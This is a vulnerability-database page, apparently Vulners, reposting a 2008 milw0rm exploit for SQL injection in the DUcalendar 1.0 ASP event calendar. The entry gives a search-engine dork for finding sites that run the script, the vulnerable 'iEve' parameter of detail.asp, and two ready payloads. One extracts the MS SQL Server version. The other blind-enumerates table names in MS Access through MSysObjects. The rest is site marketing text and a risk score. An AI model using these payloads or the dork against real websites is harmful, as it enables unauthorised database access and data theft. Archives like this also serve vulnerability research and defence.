Vulners
Lucene search
DUcalendar 1.0 - 'iEve' SQL Injection
DUcalendar v 1.0 (detail.asp?iEve=) Remote SQL Inection Exploit
[+] Script : DUcalendar
[+] Version : 1.0 (Maybe others)
[+] Exploit : Remote SQL Injection
[+] Script URL : http://www.codedworld.com/download/ducalendar-/545.html
[+] Description : ('Free Event Calendar written in ASP. Features include
unlimited entries, organized in category. Events displayed with full
description, date, location. Users can submit new events and search for
events. Complete Web-based Admin. Dreamweaver friendly.')
[+] Dork : intitle:"DUcalendar 1.0"
--//--> Exploit :
http://d0rk.co.il/calendar/detail.asp?iEve={SQL}
--__--> For Ms SQL Server : convert(int,(select+@@version))--
--__--> For Ms ACCESS (Blind-way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00
--//--> Greetz : allah , Underz0ne Crew , and all my friends ..
# milw0rm.com [2008-06-24]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jun 2008 00:00Current
7.4High risk
Vulners AI Score7.4